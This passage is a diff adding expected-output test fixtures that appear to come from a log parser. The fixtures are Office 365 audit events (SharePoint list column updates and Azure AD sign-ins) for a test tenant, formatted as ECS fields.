"o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 30032, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 31123, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 32214, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 33305, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 34396, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 35487, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:06:07.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 36578, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:07", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", + "o365.audit.IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", + "o365.audit.ObjectId": "Unknown", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "Unknown", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:08.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 37782, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:08", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "o365.audit.InterSystemsId": "f987e734-9f74-4996-8d75-6da73a443d22", + "o365.audit.IntraSystemId": "a2b50af0-f77d-4bbf-b30b-d3b2eea07300", + "o365.audit.ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "5f09333a-842c-47da-a157-57da27fcbca5", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Mac", + "user_agent.name": "Firefox", + "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "user_agent.os.full": "Mac OS X 10.15", + "user_agent.os.name": "Mac OS X", + "user_agent.os.version": "10.15", + "user_agent.version": "85.0." + }, + { + "@timestamp": "2021-02-05T09:06:34.000Z", + "client.address": "79.159.11.115", + "client.ip": "79.159.11.115", + "event.action": "UserLoggedIn", + "event.category": "authentication", + "event.code": "AzureActiveDirectoryStsLogon", + "event.dataset": "o365.audit", + "event.id": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "AzureActiveDirectory", + "event.type": [ + "start", + "authentication_success" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 39044, + "network.type": "ipv4", + "o365.audit.Actor": [ + { + "ID": "21119711-1517-43d4-8138-b537dafad016", + "Type": 0 + }, + { + "ID": "root@testsiem4.onmicrosoft.com", + "Type": 5 + } + ], + "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "o365.audit.AzureActiveDirectoryEventType": 1, + "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.CreationTime": "2021-02-05T09:06:34", + "o365.audit.ErrorNumber": "0", + "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", + "o365.audit.ExtendedProperties.ResultStatusDetail": "Redirect", + "o365.audit.ExtendedProperties.UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", + "o365.audit.Id": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "o365.audit.InterSystemsId": "e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1", + "o365.audit.IntraSystemId": "5532155c-11e4-4628-95e7-6c1ddb0d6f00", + "o365.audit.ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", + "o365.audit.Operation": "UserLoggedIn", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 15, + "o365.audit.ResultStatus": "Success", + "o365.audit.SupportTicketId": "", + "o365.audit.Target": [ + { + "ID": "5f09333a-842c-47da-a157-57da27fcbca5", + "Type": 0 + } + ], + "o365.audit.TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "AzureActiveDirectory", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "79.159.11.115", + "related.user": "root", + "service.type": "o365", + "source.as.number": 3352, + "source.as.organization.name": "Telefonica De Espana", + "source.geo.city_name": "Barcelona", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "ES", + "source.geo.country_name": "Spain", + "source.geo.location.lat": 41.3891, + "source.geo.location.lon": 2.1611, + "source.geo.region_iso_code": "ES-B", + "source.geo.region_name": "Barcelona", + "source.ip": "79.159.11.115", + "tags": [ + "forwarded" + ], + "user.domain": 